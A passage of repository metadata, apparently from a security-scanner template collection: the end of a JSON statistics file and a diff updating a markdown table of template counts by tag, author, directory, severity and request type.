s","count":2},{"name":"igs","count":2},{"name":"prometheus","count":2},{"name":"trixbox","count":2},{"name":"glassfish","count":2},{"name":"node","count":2},{"name":"keycloak","count":2},{"name":"huawei","count":2},{"name":"hashicorp","count":2},{"name":"ec2","count":2},{"name":"jeedom","count":2},{"name":"paloalto","count":2},{"name":"openfire","count":2},{"name":"icewarp","count":2},{"name":"azure","count":2},{"name":"telerik","count":2},{"name":"mida","count":2},{"name":"middleware","count":2},{"name":"proxy","count":2},{"name":"hasura","count":2},{"name":"service","count":2},{"name":"plesk","count":2},{"name":"voipmonitor","count":2},{"name":"odoo","count":2},{"name":"couchdb","count":2},{"name":"waf","count":2},{"name":"flir","count":2},{"name":"mail","count":2},{"name":"jsf","count":2},{"name":"status","count":2},{"name":"chiyu","count":2},{"name":"xxljob","count":2},{"name":"wordfence","count":2},{"name":"sonarqube","count":2},{"name":"kentico","count":2},{"name":"netis","count":2},{"name":"hoteldruid","count":2},{"name":"maian","count":2},{"name":"seeyon","count":2},{"name":"cve2005","count":2},{"name":"activemq","count":2},{"name":"bigip","count":2},{"name":"axis2","count":2},{"name":"geowebserver","count":2},{"name":"frp","count":2},{"name":"avantfax","count":2},{"name":"pega","count":2},{"name":"backdoor","count":2},{"name":"jboss","count":2},{"name":"nagios","count":2},{"name":"vrealize","count":2},{"name":"nextjs","count":2},{"name":"ecology","count":2},{"name":"webcam","count":2},{"name":"dolibarr","count":2},{"name":"smb","count":2},{"name":"kibana","count":2},{"name":"openam","count":2},{"name":"axis","count":2},{"name":"firebase","count":2},{"name":"idrac","count":2},{"name":"mcafee","count":2},{"name":"rockmongo","count":2},{"name":"globalprotect","count":2},{"name":"hpe","count":2},{"name":"cache","count":2},{"name":"guacamole","count":2},{"name":"akkadian","count":2},{"name":"pcoip","count":1},{"name":"webmodule-ee","count":1},{"name":"expn","count":1},{"name":"pagespeed","count":1},{"name":"alibaba","count":1},{"name":"centos","count":1},{"name":"bigbluebutton","count":1},{"name":"kubeflow","count":1},{"name":"landray","count":1},{"name":"clave","count":1},{"name":"kafdrop","count":1},{"name":"saltapi","count":1},{"name":"zarafa","count":1},{"name":"cve2006","count":1},{"name":"jfrog","count":1},{"name":"trilithic","count":1},{"name":"achecker","count":1},{"name":"tieline","count":1},{"name":"geddy","count":1},{"name":"graphite","count":1},{"name":"mantis","count":1},{"name":"springframework","count":1},{"name":"smartblog","count":1},{"name":"jnoj","count":1},{"name":"yachtcontrol","count":1},{"name":"clickhouse","count":1},{"name":"xunchi","count":1},{"name":"smartsense","count":1},{"name":"blue-ocean","count":1},{"name":"stem","count":1},{"name":"mirai","count":1},{"name":"sgp","count":1},{"name":"pgadmin","count":1},{"name":"hiawatha","count":1},{"name":"default","count":1},{"name":"gespage","count":1},{"name":"bedita","count":1},{"name":"vnc","count":1},{"name":"harbor","count":1},{"name":"webadmin","count":1},{"name":"haproxy","count":1},{"name":"opensmtpd","count":1},{"name":"upload","count":1},{"name":"wifisky","count":1},{"name":"nps","count":1},{"name":"tapestry","count":1},{"name":"socomec","count":1},{"name":"adb","count":1},{"name":"rsyncd","count":1},{"name":"blackboard","count":1},{"name":"servicedesk","count":1},{"name":"logontracer","count":1},{"name":"chevereto","count":1},{"name":"moin","count":1},{"name":"mobileiron","count":1},{"name":"b2evolution","count":1},{"name":"jsp","count":1},{"name":"fedora","count":1},{"name":"pacsone","count":1},{"name":"nordex","count":1},{"name":"empirecms","count":1},{"name":"mpsec","count":1},{"name":"qsan","count":1},{"name":"uwsgi","count":1},{"name":"prtg","count":1},{"name":"parentlink","count":1},{"name":"jquery","count":1},{"name":"wiki","count":1},{"name":"spidercontrol","count":1},{"name":"fortiweb","count":1},{"name":"csod","count":1},{"name":"db","count":1},{"name":"duomicms","count":1},{"name":"tongda","count":1},{"name":"tracer","count":1},{"name":"phpfusion","count":1},{"name":"gogs","count":1},{"name":"argussurveillance","count":1},{"name":"avalanche","count":1},{"name":"sentry","count":1},{"name":"acexy","count":1},{"name":"fortigates","count":1},{"name":"emby","count":1},{"name":"tjws","count":1},{"name":"beanshell","count":1},{"name":"dvwa","count":1},{"name":"linkedin","count":1},{"name":"ssl","count":1},{"name":"cacti","count":1},{"name":"expose","count":1},{"name":"tensorflow","count":1},{"name":"discourse","count":1},{"name":"processmaker","count":1},{"name":"ioncube","count":1},{"name":"panabit","count":1},{"name":"tamronos","count":1},{"name":"codeigniter","count":1},{"name":"flash","count":1},{"name":"azkaban","count":1},{"name":"bullwark","count":1},{"name":"ilo","count":1},{"name":"extractor","count":1},{"name":"vidyo","count":1},{"name":"simplecrm","count":1},{"name":"netdata","count":1},{"name":"openx","count":1},{"name":"svn","count":1},{"name":"goahead","count":1},{"name":"owasp","count":1},{"name":"razor","count":1},{"name":"panos","count":1},{"name":"commax","count":1},{"name":"qcubed","count":1},{"name":"metinfo","count":1},{"name":"csrf","count":1},{"name":"proftpd","count":1},{"name":"nuxeo","count":1},{"name":"sage","count":1},{"name":"grails","count":1},{"name":"synnefo","count":1},{"name":"fastapi","count":1},{"name":"totaljs","count":1},{"name":"tpshop","count":1},{"name":"wazuh","count":1},{"name":"aura","count":1},{"name":"solarlog","count":1},{"name":"netsweeper","count":1},{"name":"netgenie","count":1},{"name":"xiuno","count":1},{"name":"phpinfo","count":1},{"name":"octoprint","count":1},{"name":"rfi","count":1},{"name":"ruckus","count":1},{"name":"exacqvision","count":1},{"name":"soar","count":1},{"name":"ecom","count":1},{"name":"postgres","count":1},{"name":"trane","count":1},{"name":"xvr","count":1},{"name":"kyan","count":1},{"name":"monitorr","count":1},{"name":"alertmanager","count":1},{"name":"bazarr","count":1},{"name":"dotnet","count":1},{"name":"lutron","count":1},{"name":"ghost","count":1},{"name":"wavlink","count":1},{"name":"webui","count":1},{"name":"scs","count":1},{"name":"embedthis","count":1},{"name":"eyelock","count":1},{"name":"heroku","count":1},{"name":"rmi","count":1},{"name":"starttls","count":1},{"name":"ganglia","count":1},{"name":"livezilla","count":1},{"name":"optiLink","count":1},{"name":"dnssec","count":1},{"name":"chinaunicom","count":1},{"name":"nsasg","count":1},{"name":"aruba","count":1},{"name":"lighttpd","count":1},{"name":"qvisdvr","count":1},{"name":"jmx","count":1},{"name":"qdpm","count":1},{"name":"lotuscms","count":1},{"name":"javamelody","count":1},{"name":"hadoop","count":1},{"name":"resourcespace","count":1},{"name":"discord","count":1},{"name":"myucms","count":1},{"name":"opencast","count":1},{"name":"cves2016","count":1},{"name":"ambari","count":1},{"name":"moinmoin","count":1},{"name":"wooyun","count":1},{"name":"eyou","count":1},{"name":"pippoint","count":1},{"name":"rmc","count":1},{"name":"ueditor","count":1},{"name":"sidekiq","count":1},{"name":"eprints","count":1},{"name":"bitly","count":1},{"name":"circontrol","count":1},{"name":"kong","count":1},{"name":"aspnuke","count":1},{"name":"faraday","count":1},{"name":"getsimple","count":1},{"name":"sceditor","count":1},{"name":"iceflow","count":1},{"name":"huijietong","count":1},{"name":"zmanda","count":1},{"name":"tika","count":1},{"name":"addpac","count":1},{"name":"openerp","count":1},{"name":"cors","count":1},{"name":"lansweeper","count":1},{"name":"swagger","count":1},{"name":"servicenow","count":1},{"name":"wamp","count":1},{"name":"emc","count":1},{"name":"ricoh","count":1},{"name":"openstack","count":1},{"name":"office365","count":1},{"name":"dbeaver","count":1},{"name":"centreon","count":1},{"name":"jenkin","count":1},{"name":"commscope","count":1},{"name":"lanproxy","count":1},{"name":"avtech","count":1},{"name":"sangfor","count":1},{"name":"primetek","count":1},{"name":"k8s","count":1},{"name":"triconsole","count":1},{"name":"hiboss","count":1},{"name":"miscrsoft","count":1},{"name":"subrion","count":1},{"name":"payara","count":1},{"name":"druid","count":1},{"name":"wing-ftp","count":1},{"name":"gridx","count":1},{"name":"plastic","count":1},{"name":"ntopng","count":1},{"name":"appweb","count":1},{"name":"monitorix","count":1},{"name":"svnserve","count":1},{"name":"redwood","count":1},{"name":"websvn","count":1},{"name":"adminer","count":1},{"name":"skywalking","count":1},{"name":"cse","count":1},{"name":"ilo4","count":1},{"name":"camunda","count":1},{"name":"ems","count":1},{"name":"announcekit","count":1},{"name":"spip","count":1},{"name":"sourcebans","count":1},{"name":"wmt","count":1},{"name":"ewebs","count":1},{"name":"jenzabar","count":1},{"name":"memcached","count":1},{"name":"mysql","count":1},{"name":"lancom","count":1},{"name":"krweb","count":1},{"name":"blind","count":1},{"name":"xdcms","count":1},{"name":"arl","count":1},{"name":"wondercms","count":1},{"name":"webmin","count":1},{"name":"wildfly","count":1},{"name":"sar2html","count":1},{"name":"linksys","count":1},{"name":"iptime","count":1},{"name":"hortonworks","count":1},{"name":"perl","count":1},{"name":"exponentcms","count":1},{"name":"salesforce","count":1},{"name":"etouch","count":1},{"name":"zzzcms","count":1},{"name":"gitlist","count":1},{"name":"tileserver","count":1},{"name":"turbocrm","count":1},{"name":"smi","count":1},{"name":"setup","count":1},{"name":"acontent","count":1},{"name":"craftcms","count":1},{"name":"mediumish","count":1},{"name":"robomongo","count":1},{"name":"magicflow","count":1},{"name":"clink-office","count":1},{"name":"openrestry","count":1},{"name":"plone","count":1},{"name":"landrayoa","count":1},{"name":"cocoon","count":1},{"name":"solman","count":1},{"name":"apiman","count":1},{"name":"keenetic","count":1},{"name":"zenario","count":1},{"name":"k8","count":1},{"name":"jitsi","count":1},{"name":"javascript","count":1},{"name":"timeclock","count":1},{"name":"opentsdb","count":1},{"name":"portainer","count":1},{"name":"ns","count":1},{"name":"viewpoint","count":1},{"name":"rabbitmq","count":1},{"name":"webftp","count":1},{"name":"phalcon","count":1},{"name":"dom","count":1},{"name":"diris","count":1},{"name":"xml","count":1},{"name":"opm","count":1},{"name":"expressjs","count":1},{"name":"biometrics","count":1},{"name":"ssltls","count":1},{"name":"sitecore","count":1},{"name":"upnp","count":1},{"name":"zeroshell","count":1},{"name":"kerbynet","count":1},{"name":"jeewms","count":1},{"name":"influxdb","count":1},{"name":"wuzhicms","count":1},{"name":"selea","count":1},{"name":"enumeration","count":1},{"name":"nexusdb","count":1},{"name":"comodo","count":1},{"name":"concrete","count":1},{"name":"visualtools","count":1},{"name":"auth","count":1},{"name":"mautic","count":1},{"name":"woocomernce","count":1},{"name":"nuuo","count":1},{"name":"cyberoam","count":1},{"name":"email","count":1},{"name":"sco","count":1},{"name":"anchorcms","count":1},{"name":"st","count":1},{"name":"erp-nc","count":1},{"name":"redis","count":1},{"name":" default-login","count":1},{"name":"dvr","count":1},{"name":"zyxel","count":1},{"name":"octobercms","count":1},{"name":"favicon","count":1},{"name":"owa","count":1},{"name":"spring","count":1},{"name":"tectuus","count":1},{"name":"checkpoint","count":1},{"name":"redhat","count":1},{"name":"bolt","count":1},{"name":"cherokee","count":1},{"name":"zend","count":1},{"name":"vsftpd","count":1},{"name":"klog","count":1},{"name":"nedi","count":1},{"name":"timesheet","count":1},{"name":"plc","count":1},{"name":"nweb2fax","count":1},{"name":"camera","count":1},{"name":"maccmsv10","count":1},{"name":"fastcgi","count":1},{"name":"crm","count":1},{"name":"sophos","count":1},{"name":"bash","count":1},{"name":"nc2","count":1},{"name":"clockwatch","count":1},{"name":"viewlinc","count":1},{"name":"yealink","count":1},{"name":"labtech","count":1},{"name":"zte","count":1},{"name":"ruby","count":1},{"name":"sarg","count":1},{"name":"floc","count":1},{"name":"fuelcms","count":1},{"name":"pyramid","count":1},{"name":"cobub","count":1},{"name":"wavemaker","count":1},{"name":"2014","count":1},{"name":"cerebro","count":1},{"name":"scimono","count":1},{"name":"cgi","count":1},{"name":"netmask","count":1},{"name":"dotnetnuke","count":1},{"name":"interlib","count":1},{"name":"apos","count":1},{"name":"mongo","count":1},{"name":"circontrorl","count":1},{"name":"rdp","count":1},{"name":"liferay","count":1},{"name":"fortigate","count":1},{"name":"traefik","count":1},{"name":"twitter-server","count":1},{"name":"shopware","count":1},{"name":"majordomo2","count":1},{"name":"zcms","count":1},{"name":"meraki","count":1},{"name":"feifeicms","count":1},{"name":"mantisbt","count":1},{"name":"openemr","count":1},{"name":"geutebruck","count":1},{"name":"mara","count":1},{"name":"xff","count":1},{"name":"doh","count":1},{"name":"idemia","count":1},{"name":"realteo","count":1},{"name":"fortinet","count":1},{"name":"episerver","count":1},{"name":"sprintful","count":1},{"name":"esmtp","count":1},{"name":"linux","count":1},{"name":"zookeeper","count":1},{"name":"bruteforce","count":1},{"name":"whm","count":1},{"name":"drone","count":1},{"name":"enum","count":1},{"name":"netrc","count":1},{"name":"glances","count":1},{"name":"javafaces","count":1},{"name":"zm","count":1},{"name":"mdb","count":1},{"name":"calendarix","count":1},{"name":"tensorboard","count":1},{"name":"finereport","count":1},{"name":"cofax","count":1},{"name":"couchbase","count":1},{"name":"dompdf","count":1},{"name":"phpunit","count":1},{"name":"seacms","count":1},{"name":"gloo","count":1},{"name":"bookstack","count":1},{"name":"rhymix","count":1},{"name":"rujjie","count":1},{"name":"dotclear","count":1},{"name":"gotmls","count":1},{"name":"mongoshake","count":1},{"name":"vsphere","count":1},{"name":"powercreator","count":1},{"name":"froxlor","count":1},{"name":"tenda","count":1},{"name":"lg-nas","count":1},{"name":"opensns","count":1},{"name":"pulsesecure","count":1},{"name":"flink","count":1},{"name":"cloudinary","count":1},{"name":"rubedo","count":1},{"name":"xmlchart","count":1},{"name":"postmessage","count":1},{"name":"weiphp","count":1},{"name":"sqlite","count":1},{"name":"codemeter","count":1},{"name":"vscode","count":1},{"name":"exposures","count":1},{"name":"visionhub","count":1},{"name":"h3c-imc","count":1},{"name":"oscommerce","count":1},{"name":"varnish","count":1},{"name":"nette","count":1},{"name":"thinkadmin","count":1},{"name":"htmli","count":1},{"name":"74cms","count":1},{"name":"darkstat","count":1},{"name":"ulterius","count":1},{"name":"spf","count":1},{"name":"mariadb","count":1},{"name":"gateone","count":1},{"name":"yii","count":1},{"name":"mailchimp","count":1},{"name":"clusterengine","count":1},{"name":"fiori","count":1},{"name":"szhe","count":1},{"name":"node-red-dashboard","count":1},{"name":"fortilogger","count":1},{"name":"alerta","count":1},{"name":"domxss","count":1},{"name":"spectracom","count":1},{"name":"oneblog","count":1},{"name":"shopxo","count":1},{"name":"nomad","count":1},{"name":"api-manager","count":1},{"name":"plugin","count":1},{"name":"manageengine","count":1},{"name":"acme","count":1},{"name":"cloudflare","count":1},{"name":"asus","count":1},{"name":"elascticsearch","count":1},{"name":"phpfastcache","count":1},{"name":"redcap","count":1},{"name":"accela","count":1},{"name":"sureline","count":1}],"authors":[{"name":"dhiyaneshdk","count":248},{"name":"pikpikcu","count":246},{"name":"pdteam","count":198},{"name":"daffainfo","count":183},{"name":"geeknik","count":150},{"name":"dwisiswant0","count":132},{"name":"gy741","count":72},{"name":"madrobot","count":62},{"name":"pussycat0x","count":55},{"name":"princechaddha","count":55},{"name":"gaurang","count":42},{"name":"ice3man","count":26},{"name":"0x_akoko","count":25},{"name":"organiccrap","count":24},{"name":"philippedelteil","count":21},{"name":"sheikhrishad","count":15},{"name":"milo2012","count":14},{"name":"pr3r00t","count":13},{"name":"techbrunchfr","count":13},{"name":"suman_kar","count":12},{"name":"r3dg33k","count":11},{"name":"cyllective","count":11},{"name":"random_robbie","count":10},{"name":"righettod","count":10},{"name":"nadino","count":9},{"name":"wdahlenb","count":9},{"name":"melbadry9","count":9},{"name":"hackergautam","count":9},{"name":"iamthefrogy","count":8},{"name":"that_juan_","count":8},{"name":"aashiq","count":8},{"name":"oppsec","count":7},{"name":"kophjager007","count":7},{"name":"randomstr1ng","count":7},{"name":"harshbothra_","count":7},{"name":"0x240x23elu","count":7},{"name":"emadshanab","count":7},{"name":"dogasantos","count":7},{"name":"dr_set","count":7},{"name":"techryptic (@tech)","count":7},{"name":"puzzlepeaches","count":6},{"name":"logicalhunter","count":6},{"name":"__fazal","count":6},{"name":"caspergn","count":6},{"name":"meme-lord","count":6},{"name":"rootxharsh","count":5},{"name":"iamnoooob","count":5},{"name":"elsfa7110","count":5},{"name":"joanbono","count":5},{"name":"pentest_swissky","count":5},{"name":"ganofins","count":5},{"name":"panch0r3d","count":5},{"name":"yanyun","count":5},{"name":"nodauf","count":4},{"name":"github.com/its0x08","count":4},{"name":"e_schultze_","count":4},{"name":"xelkomy","count":4},{"name":"0w4ys","count":3},{"name":"thomas_from_offensity","count":3},{"name":"impramodsargar","count":3},{"name":"z3bd","count":3},{"name":"lu4nx","count":3},{"name":"jarijaas","count":3},{"name":"dudez","count":3},{"name":"f1tz","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"mavericknerd","count":3},{"name":"shifacyclewala","count":3},{"name":"incogbyte","count":3},{"name":"_generic_human_","count":3},{"name":"vsh00t","count":3},{"name":"tess","count":3},{"name":"binaryfigments","count":3},{"name":"shine","count":3},{"name":"emenalf","count":3},{"name":"fyoorer","count":3},{"name":"hahwul","count":2},{"name":"random-robbie","count":2},{"name":"w4cky_","count":2},{"name":"gevakun","count":2},{"name":"r3naissance","count":2},{"name":"kiblyn11","count":2},{"name":"udit_thakkur","count":2},{"name":"pxmme1337","count":2},{"name":"unstabl3","count":2},{"name":"bp0lr","count":2},{"name":"foulenzer","count":2},{"name":"joeldeleep","count":2},{"name":"manas_harsh","count":2},{"name":"vavkamil","count":2},{"name":"socketz","count":2},{"name":"davidmckennirey","count":2},{"name":"amsda","count":2},{"name":"bing0o","count":2},{"name":"moritz nentwig","count":2},{"name":"parth","count":2},{"name":"g4l1t0","count":2},{"name":"ree4pwn","count":2},{"name":"whoever","count":2},{"name":"nkxxkn","count":2},{"name":"0xelkomy","count":2},{"name":"hetroublemakr","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"arcc","count":2},{"name":"bsysop","count":2},{"name":"0xsapra","count":2},{"name":"x1m_martijn","count":2},{"name":"lotusdll","count":2},{"name":"fabaff","count":2},{"name":"koti2","count":2},{"name":"dheerajmadhukar","count":2},{"name":"huowuzhao","count":2},{"name":"0xcrypto","count":2},{"name":"swissky","count":2},{"name":"convisoappsec","count":2},{"name":"zomsop82","count":2},{"name":"gal nagli","count":2},{"name":"ehsahil","count":2},{"name":"cocxanh","count":2},{"name":"afaq","count":2},{"name":"sushantkamble","count":2},{"name":"johnjhacking","count":2},{"name":"alifathi-h1","count":2},{"name":"mohammedsaneem","count":2},{"name":"0xrudra","count":2},{"name":"0xprial","count":2},{"name":"randomrobbie","count":2},{"name":"c3l3si4n","count":1},{"name":"rtcms","count":1},{"name":"hakluke","count":1},{"name":"un-fmunozs","count":1},{"name":"skeltavik","count":1},{"name":"52971","count":1},{"name":"_darrenmartyn","count":1},{"name":"zandros0","count":1},{"name":"hanlaomo","count":1},{"name":"patralos","count":1},{"name":"revblock","count":1},{"name":"0xtavian","count":1},{"name":"rodnt","count":1},{"name":"abison_binoy","count":1},{"name":"s1r1u5_","count":1},{"name":"izn0u","count":1},{"name":"makyotox","count":1},{"name":"dawid-czarnecki","count":1},{"name":"borna nematzadeh","count":1},{"name":"sy3omda","count":1},{"name":"flag007","count":1},{"name":"pratik khalane","count":1},{"name":"j33n1k4","count":1},{"name":"mhdsamx","count":1},{"name":"cookiehanhoan","count":1},{"name":"johnk3r","count":1},{"name":"yavolo","count":1},{"name":"yashanand155","count":1},{"name":"elder tao","count":1},{"name":"vzamanillo","count":1},{"name":"nytr0gen","count":1},{"name":"elmahdi","count":1},{"name":"shreyapohekar","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1},{"name":"0h1in9e","count":1},{"name":"ooooooo_q","count":1},{"name":"ldionmarcil","count":1},{"name":"becivells","count":1},{"name":"sec_hawk","count":1},{"name":"iampritam","count":1},{"name":"apt-mirror","count":1},{"name":"alex","count":1},{"name":"soyelmago","count":1},{"name":"fmunozs","count":1},{"name":"adrianmf","count":1},{"name":"mah3sec_","count":1},{"name":"juicypotato1","count":1},{"name":"undefl0w","count":1},{"name":"ajaysenr","count":1},{"name":"willd96","count":1},{"name":"qlkwej","count":1},{"name":"daviey","count":1},{"name":"0xrod","count":1},{"name":"omarkurt","count":1},{"name":"pdp","count":1},{"name":"evolutionsec","count":1},{"name":"@github.com/defr0ggy","count":1},{"name":"zhenwarx","count":1},{"name":"philippdelteil","count":1},{"name":"regala_","count":1},{"name":"0xteles","count":1},{"name":"bjhulst","count":1},{"name":"wabafet","count":1},{"name":"b0yd","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"affix","count":1},{"name":"schniggie","count":1},{"name":"intx0x80","count":1},{"name":"naglinagli","count":1},{"name":"sickwell","count":1},{"name":"bernardofsr","count":1},{"name":"knassar702","count":1},{"name":"kareemse1im","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"kabirsuda","count":1},{"name":"shelld3v","count":1},{"name":"divya_mudgal","count":1},{"name":"geraldino2","count":1},{"name":"gboddin","count":1},{"name":"petruknisme","count":1},{"name":"aresx","count":1},{"name":"deena","count":1},{"name":"akshansh","count":1},{"name":"retr0","count":1},{"name":"b4uh0lz","count":1},{"name":"tim_koopmans","count":1},{"name":"luskabol","count":1},{"name":"0ut0fb4nd","count":1},{"name":"@dwisiswant0","count":1},{"name":"rojanrijal","count":1},{"name":"exploitation","count":1},{"name":"blckraven","count":1},{"name":"_c0wb0y_","count":1},{"name":"berkdusunur","count":1},{"name":"andirrahmani1","count":1},{"name":"thevillagehacker","count":1},{"name":"jteles","count":1},{"name":"taielab","count":1},{"name":"ohlinge","count":1},{"name":"sicksec","count":1},{"name":"mass0ma","count":1},{"name":"pudsec","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"yashgoti","count":1},{"name":"b0rn2r00t","count":1},{"name":"streetofhackerr007","count":1},{"name":"mubassirpatel","count":1},{"name":"absshax","count":1},{"name":"bad5ect0r","count":1},{"name":"its0x08","count":1},{"name":"whynotke","count":1},{"name":"noamrathaus","count":1},{"name":"th3.d1p4k","count":1},{"name":"chron0x","count":1},{"name":"ipanda","count":1},{"name":"_harleo","count":1},{"name":"ahmed sherif","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"kre80r","count":1},{"name":"udyz","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"infosecsanyam","count":1},{"name":"alph4byt3","count":1},{"name":"sullo","count":1},{"name":"x6263","count":1},{"name":"andysvints","count":1},{"name":"remonsec","count":1},{"name":"co0nan","count":1},{"name":"manuelbua","count":1},{"name":"toufik airane","count":1},{"name":"defr0ggy","count":1},{"name":"mesaglio","count":1},{"name":"d0rkerdevil","count":1},{"name":"furkansenan","count":1},{"name":"ringo","count":1},{"name":"idealphase","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"sshell","count":1},{"name":"fopina","count":1},{"name":"tirtha_mandal","count":1},{"name":"akash.c","count":1},{"name":"kurohost","count":1},{"name":"smaranchand","count":1},{"name":"thezakman","count":1},{"name":"notsoevilweasel","count":1},{"name":"luci","count":1},{"name":"jeya seelan","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"raesene","count":1},{"name":"me9187","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"alperenkesk","count":1},{"name":"micha3lb3n","count":1},{"name":"bolli95","count":1},{"name":"shifacyclewla","count":1},{"name":"ilovebinbash","count":1}],"directory":[{"name":"cves","count":674},{"name":"vulnerabilities","count":284},{"name":"exposed-panels","count":235},{"name":"exposures","count":186},{"name":"technologies","count":170},{"name":"misconfiguration","count":129},{"name":"takeovers","count":71},{"name":"default-logins","count":54},{"name":"file","count":46},{"name":"workflows","count":35},{"name":"network","count":30},{"name":"miscellaneous","count":24},{"name":"iot","count":23},{"name":"dns","count":11},{"name":"fuzzing","count":9},{"name":"cnvd","count":9},{"name":"headless","count":5},{"name":".pre-commit-config.yaml","count":1}],"severity":[{"name":"info","count":615},{"name":"high","count":535},{"name":"medium","count":413},{"name":"critical","count":236},{"name":"low","count":161}],"types":[{"name":"http","count":1859},{"name":"file","count":46},{"name":"network","count":39},{"name":"dns","count":11}]} diff --git a/TEMPLATES-STATS.md b/TEMPLATES-STATS.md index 30f542f672..a7efc05b55 100644 --- a/TEMPLATES-STATS.md +++ b/TEMPLATES-STATS.md @@ -1,741 +1,750 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |--------------------|-------|--------------------------------|-------|-------------------------|-------|----------|-------|---------|-------| -| cve | 649 | dhiyaneshdk | 245 | cves | 657 | info | 610 | http | 1833 | -| panel | 236 | pikpikcu | 244 | vulnerabilities | 284 | high | 526 | file | 46 | -| xss | 224 | pdteam | 198 | exposed-panels | 235 | medium | 406 | network | 39 | -| lfi | 221 | daffainfo | 176 | exposures | 185 | critical | 232 | dns | 11 | -| exposure | 217 | geeknik | 149 | technologies | 164 | low | 160 | | | -| wordpress | 205 | dwisiswant0 | 132 | misconfiguration | 125 | | | | | -| rce | 190 | gy741 | 72 | takeovers | 71 | | | | | -| cve2020 | 157 | madrobot | 62 | default-logins | 52 | | | | | -| wp-plugin | 138 | princechaddha | 54 | file | 46 | | | | | -| cve2021 | 106 | pussycat0x | 48 | workflows | 35 | | | | | -| tech | 106 | gaurang | 42 | network | 30 | | | | | -| config | 93 | ice3man | 26 | miscellaneous | 28 | | | | | -| cve2019 | 91 | organiccrap | 24 | iot | 23 | | | | | -| cve2018 | 80 | 0x_akoko | 24 | dns | 11 | | | | | -| takeover | 74 | philippedelteil | 19 | fuzzing | 9 | | | | | -| | 66 | sheikhrishad | 15 | cnvd | 9 | | | | | -| apache | 66 | milo2012 | 14 | headless | 5 | | | | | -| token | 64 | techbrunchfr | 13 | .pre-commit-config.yaml | 1 | | | | | -| default-login | 58 | pr3r00t | 13 | | | | | | | -| iot | 56 | suman_kar | 12 | | | | | | | -| joomla | 52 | cyllective | 11 | | | | | | | -| cve2017 | 48 | r3dg33k | 11 | | | | | | | -| file | 46 | righettod | 10 | | | | | | | -| unauth | 45 | random_robbie | 10 | | | | | | | -| oob | 45 | wdahlenb | 9 | | | | | | | -| cve2010 | 44 | hackergautam | 9 | | | | | | | +| cve | 666 | dhiyaneshdk | 248 | cves | 674 | info | 615 | http | 1859 | +| panel | 236 | pikpikcu | 246 | vulnerabilities | 284 | high | 535 | file | 46 | +| lfi | 228 | pdteam | 198 | exposed-panels | 235 | medium | 413 | network | 39 | +| xss | 225 | daffainfo | 183 | exposures | 186 | critical | 236 | dns | 11 | +| exposure | 221 | geeknik | 150 | technologies | 170 | low | 161 | | | +| wordpress | 206 | dwisiswant0 | 132 | misconfiguration | 129 | | | | | +| rce | 193 | gy741 | 72 | takeovers | 71 | | | | | +| cve2020 | 159 | madrobot | 62 | default-logins | 54 | | | | | +| wp-plugin | 139 | pussycat0x | 55 | file | 46 | | | | | +| cve2021 | 112 | princechaddha | 55 | workflows | 35 | | | | | +| tech | 111 | gaurang | 42 | network | 30 | | | | | +| config | 93 | ice3man | 26 | miscellaneous | 24 | | | | | +| cve2019 | 90 | 0x_akoko | 25 | iot | 23 | | | | | +| cve2018 | 80 | organiccrap | 24 | dns | 11 | | | | | +| takeover | 74 | philippedelteil | 21 | fuzzing | 9 | | | | | +| apache | 66 | sheikhrishad | 15 | cnvd | 9 | | | | | +| | 66 | milo2012 | 14 | headless | 5 | | | | | +| token | 64 | pr3r00t | 13 | .pre-commit-config.yaml | 1 | | | | | +| default-login | 60 | techbrunchfr | 13 | | | | | | | +| joomla | 59 | suman_kar | 12 | | | | | | | +| iot | 58 | cyllective | 11 | | | | | | | +| cve2010 | 51 | r3dg33k | 11 | | | | | | | +| cve2017 | 49 | random_robbie | 10 | | | | | | | +| oob | 48 | righettod | 10 | | | | | | | +| file | 46 | wdahlenb | 9 | | | | | | | +| unauth | 45 | melbadry9 | 9 | | | | | | | | network | 39 | nadino | 9 | | | | | | | -| sqli | 37 | melbadry9 | 9 | | | | | | | -| ssrf | 32 | aashiq | 8 | | | | | | | -| cve2016 | 32 | that_juan_ | 8 | | | | | | | -| workflow | 30 | iamthefrogy | 8 | | | | | | | -| oracle | 30 | 0x240x23elu | 7 | | | | | | | +| sqli | 38 | hackergautam | 9 | | | | | | | +| ssrf | 35 | that_juan_ | 8 | | | | | | | +| cve2016 | 32 | aashiq | 8 | | | | | | | +| oracle | 31 | iamthefrogy | 8 | | | | | | | | logs | 30 | kophjager007 | 7 | | | | | | | -| jira | 28 | techryptic (@tech) | 7 | | | | | | | -| misc | 27 | oppsec | 7 | | | | | | | -| atlassian | 27 | randomstr1ng | 7 | | | | | | | -| redirect | 26 | dogasantos | 7 | | | | | | | +| workflow | 30 | techryptic (@tech) | 7 | | | | | | | +| redirect | 28 | randomstr1ng | 7 | | | | | | | +| jira | 28 | dogasantos | 7 | | | | | | | +| atlassian | 27 | emadshanab | 7 | | | | | | | | listing | 25 | dr_set | 7 | | | | | | | -| generic | 22 | harshbothra_ | 7 | | | | | | | -| aem | 19 | emadshanab | 7 | | | | | | | -| cisco | 19 | __fazal | 6 | | | | | | | -| router | 19 | puzzlepeaches | 6 | | | | | | | -| cve2015 | 19 | caspergn | 6 | | | | | | | -| sap | 18 | meme-lord | 6 | | | | | | | -| disclosure | 18 | elsfa7110 | 5 | | | | | | | -| auth-bypass | 17 | joanbono | 5 | | | | | | | -| springboot | 16 | yanyun | 5 | | | | | | | -| cve2014 | 15 | panch0r3d | 5 | | | | | | | -| cve2012 | 14 | iamnoooob | 5 | | | | | | | -| debug | 14 | rootxharsh | 5 | | | | | | | -| android | 13 | pentest_swissky | 5 | | | | | | | -| cve2011 | 13 | logicalhunter | 5 | | | | | | | -| misconfig | 13 | ganofins | 5 | | | | | | | -| struts | 13 | nodauf | 4 | | | | | | | +| misc | 23 | 0x240x23elu | 7 | | | | | | | 